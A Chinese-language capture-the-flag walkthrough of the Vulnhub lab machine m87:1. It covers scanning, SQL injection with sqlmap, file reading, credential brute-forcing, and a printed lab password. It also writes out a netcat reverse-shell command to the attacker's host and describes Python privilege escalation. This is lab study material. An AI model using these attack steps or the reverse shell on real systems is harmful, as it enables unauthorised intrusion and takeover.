Vulnhub靶机m87:1渗透

靶机介绍
官方下载地址：http://www.vulnhub.com/entry/m87-1,595/
靶机难度容易，拥有两个用户，网络适配器是NAT模式自动分配IP地址

运行环境
靶机：网络设为NAT，IP地址：192.168.174.138
攻击机：同网段下的kali linux，IP地址：192.168.174.135
开始渗透
运行靶机

靶机运行之后就提示了IP地址，端口和一个域名
扫一下端口看是否有其他存在



扫一下80端口的目录

开始访问得到的这些目录
80端口的首页

admin

/admin/backup/

9090端口首页

找到了四个登录页面
http://192.168.174.138/admin/ 输入参数id=’ 出现报错 id=1的时候回显正常 说明存在注入点

使用sqlmap跑一下，确实存在注入点

在db的数据库的users表当中找到了用户名密码

经过多次尝试这里的用户名密码是无法登录任何一个登录页面
但是数据库存在flie权限，可以读取文件


查看passwd


这里看到确实只存在两个用户
接下就不知道怎么办了，最后看了某一位大佬的视频才做出来的，将所有用户和密码收集起来使用burp进行爆破，
最后使用charlotte：15The4Dm1n4L1f3登录9090端口的首页


在终端选项里面发现可以执行系统命令，接下来就是提权了，有好几个方法可以提权

第一个方法：
执行命令反弹shell到本地 nc -e /bin/bash 192.168.174.135 4444


使用python打开一个终端

查看old发现是python2.7可以利用os模块调用本地的root的shell


第二个方法：
利用python相关的提权命令进行提权


也可以不反弹shell到本地直接在浏览器执行提权命令


这个靶机到这里就渗透结束了，难点在于获取用户名和密码